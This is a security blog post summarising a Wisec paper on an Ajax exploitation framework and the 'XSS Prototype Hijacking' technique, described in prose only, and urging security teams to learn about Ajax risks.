Reading an interesting paper from Wisec Italy, who presented a paper on an exploitation framework for Ajax and Web 2.0.
The link the file is here, the link to Wisec is here, and it makes for some interesting reading.
The premise of the framework is:
Ajax problems are present both client side and server side and can be classified as follows:
1. System Architecture;
2. Authorization and authentication;
3. Client/Server communication;
4. Management of communication (usually XML);
5. Client and Server are not trusted.
These are all pretty standard issues that when dealing with normal web applications that most web application penetration folks will attempt to subvert. What makes this more interesting is when you can move bits of java code around because the web site owner has made all files read/write or even better read/write/execute (755 or 777 in both UNIX and windows) to make some applications work at all.
While most web applications, or web enabled applications have many common issues, the development of a full Ajax exploitation framework like the Metasploit framework, or purchased web application penetration tools like SpiDynamics Web Inspect is getting to be more and more necessary as information security people do not have the skill sets to properly ascertain the ramifications of some Ajax implementations.
The attack structure called XSS Prototype HiJacking as proposed by Wisec goes like this:
“XSS Prototype Hijacking – It will now be described a new advanced technique to gain total control over an Ajax application. This attack is exclusively based on some of the intrinsic properties of Prototype Languages like Javascript. Prototype based programming is a style of Object Oriented programming where classes are not present; indeed, objects are cloned from already existing objects (native objects) or from scratch (empty objects). Eventually, new methods or attributes belonging to an object could be created or reimplemented by simply defining them.” (Wisec)
Security folks are behind the power curve on issues like this, and more training needs to be done so that security folks are more aware of what is happening in the world of Ajax. As people write better and better descriptions of code exploits, and those exploits are released like the ones on MySpace, Yahoo, and others, security folks should be testing for these kinds of issues. Or at least reading the papers and working with developers to raise the level of awareness for both security and development teams.
For Ajax security and for Ajax developers, this paper just became a must read as understanding the implications of certain implementations are being read by hackers and folks that want to own your web site.
Tag:
Add to 
Bookmark Murdok:
Dan Morrill has been in the information security field for 18 years, both
civilian and military, and is currently working on his Doctor of Management.
Dan shares his insights on the important security issues of today through
his blog, Managing
Intellectual Property & IT Security, and is an active participant in the
ITtoolbox blogging community.
